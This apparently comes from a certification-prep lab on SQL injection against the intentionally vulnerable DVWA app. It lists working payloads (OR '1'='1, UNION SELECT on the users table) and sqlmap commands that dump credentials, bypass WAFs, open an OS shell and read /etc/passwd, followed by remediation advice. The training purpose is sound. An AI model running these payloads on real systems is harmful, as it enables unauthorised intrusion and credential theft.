Exam objective: 4.5 Injection attacks — SQL injection.
In this lab you will exploit SQL injection in DVWA manually and then automate the entire dump with sqlmap.
sudo docker run --rm -d --name dvwa -p 80:80 vulnerables/web-dvwaBrowse to http://127.0.0.1, log in (admin/password), Security → Low, then click SQL Injection.
The endpoint is GET /vulnerabilities/sqli/?id=1. Try:
?id=1
?id=1' OR '1'='1
?id=1' UNION SELECT 1,version()-- -
?id=1' UNION SELECT user,password FROM users-- -
You learn:
- Number of columns (use
ORDER BYto find). - DBMS version (
version()). - Table/column names.
In DevTools → Application → Cookies, copy PHPSESSID and security.
COOKIE="PHPSESSID=abc; security=low"
URL='http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit'sqlmap -u "$URL" --cookie="$COOKIE" --batch--batch accepts all default prompts. sqlmap detects: parameter id is injectable via boolean-based, error-based and UNION query, DBMS is MySQL.
sqlmap -u "$URL" --cookie="$COOKIE" --batch --dbs
sqlmap -u "$URL" --cookie="$COOKIE" --batch -D dvwa --tables
sqlmap -u "$URL" --cookie="$COOKIE" --batch -D dvwa -T users --columns
sqlmap -u "$URL" --cookie="$COOKIE" --batch -D dvwa -T users --dumpYou will see the MD5 hash for admin — crack it in Lab 24.
sqlmap -u "$URL" --cookie="$COOKIE" --risk=3 --level=5 --batch--level 1–5how many payloads.--risk 1–3how heavy (3 allowsOR-based blind, may slow target).
Use --tamper=space2comment,between to bypass simple WAFs.
For a POST form:
sqlmap -u 'http://target/login' --data='user=a&pass=b' --batchFor JSON API:
sqlmap -u 'http://target/api/search' \
--data='{"q":"*"}' --headers='Content-Type: application/json' \
--batchCapture the raw HTTP request from Burp → Save item → feed to sqlmap with -r:
sqlmap -r request.txt --batchIf the DB user has FILE / xp_cmdshell privileges:
sqlmap -r request.txt --os-shell # MySQL / MSSQL OS command shell
sqlmap -r request.txt --file-read=/etc/passwd--os-shell is invasive — confirm scope before using.
For every SQLi finding:
- CWE-89 SQL Injection, OWASP A03:2021 Injection, ATT&CK T1190.
- Recommend prepared statements / parameterised queries.
- Add WAF managed SQLi rule as compensating control.
- Rotate any credentials that were exposed via
--dump.
- The manual UNION-based injection flow before reaching for sqlmap.
- How to drive sqlmap with cookies, POST, JSON and Burp raw requests.
- The risk/level/tamper levers and when to stop short of
--os-shell.